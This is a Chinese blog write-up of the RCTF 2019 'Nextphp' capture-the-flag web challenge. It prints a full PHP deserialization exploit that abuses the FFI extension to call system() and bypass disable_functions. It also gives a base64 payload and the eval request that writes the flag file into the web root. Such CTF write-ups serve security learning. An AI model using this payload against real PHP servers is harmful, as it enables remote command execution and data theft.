[RCTF 2019]Nextphp

最新推荐文章于 2023-11-08 19:51:48 发布
最新推荐文章于 2023-11-08 19:51:48 发布
阅读量822 收藏 1
点赞数 3
分类专栏: # ctf做题记录 php反序列化 文章标签: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fmyyy1/article/details/116998001
版权

场景
在这里插入图片描述
源码就相当于一个一句话木马。肯定没这么简单,先看看phpinfo
disable_functions里禁掉了不少函数
在这里插入图片描述
刚开始想的是用file_put_contents函数写shell再用蚁剑插件绕过disable_functions,但测试后不行,不过也得到了一些有用的信息。

在这里插入图片描述
有个preload.php

<?php
final class A implements Serializable {
    protected $data = [
        'ret' => null,
        'func' => 'print_r',
        'arg' => '1'
    ];

    private function run () {
        $this->data['ret'] = $this->data['func']($this->data['arg']);
    }

    public function __serialize(): array {
        return $this->data;
    }

    public function __unserialize(array $data) {
        array_merge($this->data, $data);
        $this->run();
    }

    public function serialize (): string {
        return serialize($this->data);
    }

    public function unserialize($payload) {
        $this->data = unserialize($payload);
        $this->run();
    }

    public function __get ($key) {
        return $this->data[$key];
    }

    public function __set ($key, $value) {
        throw new \Exception('No implemented');
    }

    public function __construct () {
        throw new \Exception('No implemented');
    }
}

应该是反序列化,这里源码很简单,构造反序列化后在a里面调用__get(‘ret’)可以输出我们的值,这里data[‘func’]和data[‘arg’]都是我们可控的。但问题是如何利用这个拿到flag。
在这里插入图片描述
构造反序列化

<?php
final class A implements Serializable {
    protected $data = [
        'ret' => null,
        'func' => 'FFI::cdef',
        'arg' => 'int system(char *command);'
    ];

    private function run () {
        echo "run<br>";
        $this->data['ret'] = $this->data['func']($this->data['arg']);
    }
    public function serialize () {
        return serialize($this->data);
    }

    public function unserialize($payload) {
        $this->data = unserialize($payload);
        $this->run();
    }

    public function __get ($key) {
        return $this->data[$key];
    }

    public function __set ($key, $value) {
        throw new \Exception('No implemented');
    }

    public function __construct () {
        echo "__construct<br>";
    }
}

$a = new A();
echo base64_encode(serialize($a)); // 即payload
//QzoxOiJBIjo4OTp7YTozOntzOjM6InJldCI7TjtzOjQ6ImZ1bmMiO3M6OToiRkZJOjpjZGVmIjtzOjM6ImFyZyI7czoyNjoiaW50IHN5c3RlbShjaGFyICpjb21tYW5kKTsiO319

参考
参考这里因为无法直接回显,所以在vps上监听
在这里插入图片描述
这里还有一个更简便的方法是写入文件
?a=unserialize(base64_decode('QzoxOiJBIjo4OTp7YTozOntzOjM6InJldCI7TjtzOjQ6ImZ1bmMiO3M6OToiRkZJOjpjZGVmIjtzOjM6ImFyZyI7czoyNjoiaW50IHN5c3RlbShjaGFyICpjb21tYW5kKTsiO319'))->__serialize()['ret']->system('cat /flag>/var/www/html/1.txt');
这里将值直接写入了txt文件,打入后再访问这个txt文件。
在这里插入图片描述
拿到flag。

fmyyy1
关注
  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
[RCTF 2019]Nextphp题解
blue_lotus_first的博客
09-21 1168
[RCTF 2019]NextPHP题解
[wp] RCTF2019-nextphp
MercyLin的博客
09-11 1765
<?php if (isset($_GET['a'])) { eval($_GET['a']); } else { show_source(__FILE__); } 尝试利用eval ?a=echo system("ls"); system()函数被禁止了. 尝试查看phpinfo(); ?a=phpinfo(); 查看成功,在页面查找disable_function...
PHP7.4 FFI 扩展安全问题
weixin_63231007的博客
02-22 1300
PHP 7.4 FFI扩展 bypass disable_function&[RCTF] nextphp&geek2020 FighterFightsInvincibly
[RCTF 2019]Nextphpphp7.4的FFI扩展安全问题)
m0_62422842的博客
12-14 656
这个FFI扩展最初是为了能够更方便的调用C语言的各种库而设计的,然而在不正确的使用下就会像该题这样,直接绕过php层的限制去执行命令。当然,个人觉得该扩展引发的安全问题也是比较好防护的。设置ffi.enable=preload参数选项,指定特定的php文件去调用FFI。总之,FFI扩展引发的问题也是需要了解的。
RCTF2019-WEB-nextphp
river
05-31 1800
RCTF-web-nextphp <?php if (isset($_GET['a'])) { eval($_GET['a']); } else { show_source(__FILE__); } http://192.168.1.8/?a=var_dump(scandir(getcwd())); http://192.168.1.8/?a=show_so...
RCTF2020.zip
07-20
RCTF2020 比赛逆向 pwn等赛题,除web题外所有赛题均有
rctf:redpwn的CTF平台
03-28
rCTF是redpwnCTFCTF平台。 它由 CTF团队开发和维护。 入门 要开始使用rCTF,请访问文档在 如果您需要有关rCTF的帮助,请加入并在#rctf-help频道中提问。 使用rCTF部署挑战 rCTF本身不处理挑战性部署。 (可选)...
RCTF_2015_web500.rar
09-30
【标题】"RCTF_2015_web500.rar" 指的可能是一个在2015年RCTF(Redbud Cybersecurity Technology Challenge)网络安全竞赛中的Web类题目,难度级别可能是500分,暗示这道题目相对复杂。这种竞赛通常涉及网络安全、...
Python库 | rctf-golf-1.0.0.tar.gz
03-10
本资源是一个名为“rctf-golf”的Python库,版本为1.0.0,封装在“rctf-golf-1.0.0.tar.gz”压缩包内。这个库可能是为了解决特定问题或提供某些功能而创建的,它通常包含一系列模块、脚本和文档,方便开发者在自己的...
[RCTF 2019]Nextphp&&php预加载实现FFI
Je3Z的博客
09-12 416
参考 <?php if (isset($_GET['a'])) { eval($_GET['a']); } else { show_source(__FILE__); } 初看题目很简单,然后看了下phpinfo 过滤了挺多函数的,命令执行的都过滤了,然后还有open_basedir限制/var/www/html 然后可能会想一些绕过disable_function的姿势 1.LD_PRELOAD mail,putenv,error_log全被禁了 2.Apache Mod CGI
RCTF-2021-HarmonyOS赛题WP
kelxLZ的博客
09-13 631
Author:ZERO-A-ONE Date:2021-08-08 0x1 出题意图 本体定位为基础的逆向题目,主要是为了熟悉Open HarmonyOS操作系统环境,熟悉基于OpenHarmony Hi3861V100开发板的RISC-V环境,熟悉IoT环境下常用的Musl-Libc环境 0x2 出题过程 2.1 编译系统固件 riscv32_virt/ 子目录包含部分Qemu RISC-V虚拟化平台验证的OpenHarmony kernel_liteos_m的代码,目录名为riscv32_virt。.
[RCTF 2019]nextphp
最新发布
rev1ve的博客
11-08 854
官方文档在php版本7.4或更高的版本中将和添加到类中,而无需考虑兼容性文档中给出了实例作者指出这种形式的代码无法可靠运行,因为嵌套的 serialize() 和 unserialize() 调用是以不同顺序执行的因为在序列化过程中,首先执行 A::serialize() 中的 serialize() 调用,然后执行 B::serialize() 中的 serialize() 调用。
RCTF2021 ezshell
feng的博客
11-05 548
前言 RCTF当时没打,感觉还是错过了学习的机会。今天下午看firebasky师傅的github的时候偶然看到了RCTF的题目,所以打算找个时间把这个比赛的Web复现一下。就没有把所有的web题目都放一篇文章上,因为最近各种事情还有复习,复现题目也是断断续续了,可能接下来会过个好几天才继续看下一题,时间间隔拉的太久,而且每道题学到的东西也比较多,写的相对来说也比较详细,就单独拉出来成一篇文章了。 Writeup Misc里面的一道Web,get访问/shell之后可以得到源码反编译之后审计一下: // //
php算法刷题网站,刷题[RCTF 2019]Nextphp
weixin_42364392的博客
04-14 294
解题思路打开发现,???,这么简单嘛,直接一句话写shellfile_put_contents('1.php','');蚁剑连接,???,就这?好吧,只有当前目录的权限,看preload.php,看着是反序列化了我懒,不想看序列化,不过感觉是都被禁了,没啥用bypass_diasble_function1.LD_PRELOADmail,putenv,error_log全被禁了,打扰了2.**Apa...
buuctf-web部分wp(更新一下)
a3uRa的一个窝
02-17 3698
前言(撮合看看吧 因为直接复制的本地 所以图片就没法显示了 有什么不懂的地方可以给我留言哦~ 然后推荐一个公众号:lin先森 求关注) b站 [BJDCTF2020]Easy MD5 f12 Hint: select * from ‘admin’ where password=md5($pass,true) ffifdyop 弱类型绕过 数组绕过 [极客大挑战 2019]Http 修改头 [...
RCTF2018 WP
1CHIG0的博客
05-24 1780
感觉自己好久更了。。最近看了RCTF的WEB题,感觉好多前端。。然而前端并不是很会,于是趁着这个机会稍稍补了一些前端知识。又跟着大佬的wp复现了一下,收获不少,总结一下。AMP参考了1、https://ctftime.org/writeup/101012、https://xz.aliyun.com/t/2347进入页面,首先根据提示可以给一个参数name,输入?name=ichigo得到我们得到了...
BUU刷题记录——5
weixin_43610673的博客
09-21 1512
October 2019 Twice SQL Injection 由题目名可知为二次注入 username =1' union select database() # username =1' union select group_concat(table_name) from information_schema.tables where table_schema='ctftraining' # username =1' union select group
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值